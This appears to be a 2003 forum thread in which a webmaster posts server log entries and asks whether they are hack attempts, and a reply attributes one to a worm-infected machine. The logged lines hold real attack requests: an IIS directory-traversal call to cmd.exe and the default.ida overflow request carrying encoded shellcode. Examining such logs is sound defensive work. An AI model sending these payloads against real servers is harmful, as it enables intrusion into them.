1. Home
  2. Forums Index
  3. WebmasterWorld / Website Analytics - Tracking and Logging 6:58 am May 14, 2026

Forum Moderators: DixonJones

Message Too Old, No Replies

Is this a hack attempt or misdirected link attempt?

Unusual Messages in Connection Log

         

maxmachine

1:57 am on Mar 25, 2003 (gmt 0)



On a daily basis I fine GET and Post messages in the log file that are either trying to access files or directories that do not exist or posting to a script that does not exist. A few I recognize as hacks but others I'm unsure of. If anyone is aware of a forum that list these unusual but frequent attempts (I don’t know what to call them…misguided server request), please let me know.

66.130.231.75 - - [21/Mar/2003:14:59:09 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323

66.140.83.43 - - [20/Mar/2003:14:27:27 -0500] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 313

deejay

2:07 am on Mar 25, 2003 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



I queried the default.ida one with my webhost (get a couple every day) - they said it is a machine infected with NIMDA looking for somewhere else to infect. Whether it is a problem or not depends on if your host is up to scratch.
 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

  1. Home
  2. Forums Index
  3. WebmasterWorld / Website Analytics - Tracking and Logging 6:58 am May 14, 2026